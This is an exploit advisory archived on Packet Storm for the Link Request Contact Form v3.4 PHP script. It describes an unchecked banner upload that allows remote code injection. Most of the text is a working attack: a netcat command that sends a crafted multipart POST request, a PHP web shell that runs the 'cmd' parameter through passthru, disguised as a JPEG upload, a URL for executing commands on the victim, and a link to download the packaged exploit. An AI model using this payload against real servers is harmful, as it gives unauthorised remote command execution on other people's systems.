exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

lrcf-inject.txt

lrcf-inject.txt
Posted Jun 11, 2007
Authored by CorryL

Link Request Contact Form version 3.4 suffers from a remote code injection vulnerability. Full exploit provided.

tags | exploit, remote
SHA-256 | 0423208100e20e1bcf2100f3deddf8c13824689edc37c5cec1338f65e81ec3a2

lrcf-inject.txt

Change Mirror Download
-=[--------------------ADVISORY-------------------]=-

Link Request Contact Form v3.4

Author: CorryL [corryl80@gmail.com]
-=[-----------------------------------------------]=-


-=[+] Application: Link Request Contact Form
-=[+] Version: 3.4
-=[+] Vendor's URL: http://www.americanfinancing.net/link-request-contact-form.cfm
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: Remote code injection
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: http://corryl.altervista.org/
-=[+] Irc Chan: irc.darksin.net #x0n3-h4ck


..::[ Descriprion ]::..


Link Request Contact Form v3.4 is designed to let your friends or clients request to add their website link(s)
banner(s) to your website.
User can upload their banner(s) to a directory being a JPG or GIF file for your review before you post their listing(s).
Once the user fills in all the details an email will be sent to you with the file location and the users details.
The script will also email your client with a Confirmation email providing them with the same details.
You can modify the script to your liking and change the location of where the files will be store easily.
There are no restrictions and easy installation instructions are provided.


..::[ Bug ]::..

This software is affection from a bug type remote code injection,
a remote attacker is able' to injecting of the code inside the server victim,
to subsequently be performed.
This happens because' the script allows to insert an image jpg or bmp,
but not checking the data, and allowing of injecting of the code php.



..::[ Proof Of Concept ]::..

cut the exploit.txt edit the server-victim information,
using netcat to sending the exploit to server.

nc server-victim 80 < exploit.txt

open the browser and connection to http://server-victim/uploads/shell.php?cmd=uname -a

<---------cut here exploit.txt--------->
POST http://server-victim:80/output.php HTTP/1.1
Host: www.server-victim.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; it; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/prova/link-request-contact-form.html
Cookie: PHPSESSID=0654c063218badc1ad8b5a04edf9198d
Content-Type: multipart/form-data; boundary=---------------------------190291279311134
Content-length: 1115

-----------------------------190291279311134
Content-Disposition: form-data; name="Full_Name"

aaa
-----------------------------190291279311134
Content-Disposition: form-data; name="email"

aa@aa.aa
-----------------------------190291279311134
Content-Disposition: form-data; name="Link_Back"

http://127.0.0.1/
-----------------------------190291279311134
Content-Disposition: form-data; name="Site_Title"

aa
-----------------------------190291279311134
Content-Disposition: form-data; name="You_Web_Address"

http://127.0.0.1/
-----------------------------190291279311134
Content-Disposition: form-data; name="Site_Description"

aaa
-----------------------------190291279311134
Content-Disposition: form-data; name="upload"; filename="shell.php"
Content-Type: image/jpeg

<?php ob_clean();echo"Remote command esecution by CorryL http://corryl.altervista.org";ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>
-----------------------------190291279311134
Content-Disposition: form-data; name="Submit"

Submit
-----------------------------190291279311134--



<----------------end cut---------------->


download the netcat+exploit from my server:

http://corryl.altervista.org/index.php?mod=Download/Exploit#exploit-LRCF-v3.4.rar



Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close